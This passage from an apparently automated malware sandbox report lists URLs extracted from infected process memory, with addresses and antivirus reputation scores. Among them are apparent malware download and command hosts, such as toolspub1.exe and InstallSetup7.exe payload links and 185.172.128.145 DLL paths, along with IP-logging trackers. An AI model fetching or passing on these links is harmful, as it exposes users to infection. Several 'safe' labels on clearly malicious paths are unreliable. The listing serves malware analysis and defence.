00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                		high
                                                                http://yip.suInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://galandskiyher5.com/downloads/toolspub1.exe4kLInstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003815000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000000.2363308446.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3339996391.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000000.2672587380.0000000000401000.00000020.00000001.01000000.0000001F.sdmpfalse
                                                                    		high
                                                                    http://185.172.128.126/InstallSetup7.exe4kLInstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://185.172.128.145/15f649199f40275b/vcruntime140.dlltablesyncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crl.ver)svchost.exe, 00000002.00000002.3430656539.000002191A400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://net.geo.operInstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://opera.com/privacy7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                        		high
                                                                        https://www.ecosia.org/newtab/syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://gamemaker.io)7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exeInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://https://_bad_pdb_file.pdbN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          http://185.172.128.187/3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 15%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://15.204.49.148InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 18%, Virustotal, Browse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://nsis.sf.net/NSIS_Error3cs4PKncIzTPVTZHP3GDsO8B.exe, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000000.2546813100.000000000040B000.00000002.00000001.01000000.00000011.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000000.2603377922.000000000040B000.00000002.00000001.01000000.00000018.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3358148419.000000000040B000.00000002.00000001.01000000.0000001C.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000000.2672813339.000000000040B000.00000002.00000001.01000000.00000020.sdmpfalse
                                                                            		high
                                                                            http://net.geo.opera.comInstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.google.com/feedfetcher.html)HKLMN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                		high
                                                                                https://blockchain.infoindexN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://gamemaker.io/en/get.7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://namecloudvideo.orgInstallUtil.exe, 00000004.00000002.3412274842.00000000037DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://gamemaker.io7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://185.172.128.187/ping.php?substr=seven3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 17%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://download3.operacdn.com/57odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://pastebin.comInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 1%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767&utm_medium=apb&utm_source=mkt&http_xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3389482183.0000000054A40000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390871165.0000000054B34000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390454774.0000000054AE0000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://download3.operacdn.com/ftp/pub/opera/desktop/108.0.5067.24/win/Opera_108.0.5067.24_AutoupdatXgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://185.172.128.145/15f649199f40275b/freebl3.dllyqsyncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 4%, Virustotal, Browse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003815000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000000.2363308446.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3339996391.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000000.2672587380.0000000000401000.00000020.00000001.01000000.0000001F.sdmpfalse
                                                                                          		high
                                                                                          https://crashpad.chromium.org/bug/new7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                                            		high
                                                                                            http://185.172.128.145/15f649199f40275b/syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                            • 2%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://desktop-netinstaller-sub.osp.opera.software/ry7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://iplogger.org/InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://download.opera.com/download/get/?id=65199&autoupdate=1&ni=1&stream=stable&utm_campaign=767&uxzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://185.172.128.145/15f649199f40275b/freebl3.dlliqsyncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://download3.operacdn.com/v=7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://autoupdate.geo.opera.com/J5xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://185.172.128.187/ping.php?substr=sevenminuser-l1-1-03cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://yip.suInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://15.204.498:InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		low
                                                                                                        https://crashstats-collector.opera.com/collector/submitP7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391875996.0000000050E54000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://185.172.128.145/15f649199f40275b/sqlite3.dllsyncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 17%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://185.172.128InstallUtil.exe, 00000004.00000002.3412274842.00000000037C9000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		low
                                                                                                          https://net.geo.opera.comInstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://vovsoft.com/newsletter/JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364169110.0000000002240000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000002.3335089393.0000000002010000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364717240.0000000002004000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374459385.0000000003110000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374651648.00000000021BC000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384449389.0000000000699000.00000004.00000020.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384651313.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629728439.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3381759590.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629814594.0000000001FD4000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000002.3386461387.0000000002080000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675623782.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2675733855.0000000002074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icosyncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://185.172.128.145/15f649199f40275b/sqlite3.dllCRsyncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://search.msn.com/msnbot.htm)msnbot/1.1N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                                                		high
                                                                                                                https://yip.su/RNWPdInstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://185.172.128.187/ping.php?substr=seven93cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://vovsoft.com/contact/.JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364169110.0000000002240000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000002.3335089393.0000000002010000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000003.2364717240.0000000002004000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374459385.0000000003110000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000003.2374651648.00000000021BC000.00000004.00001000.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384449389.0000000000699000.00000004.00000020.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000002.3384651313.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629728439.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3381759590.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2629814594.0000000001FD4000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000002.3386461387.0000000002080000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 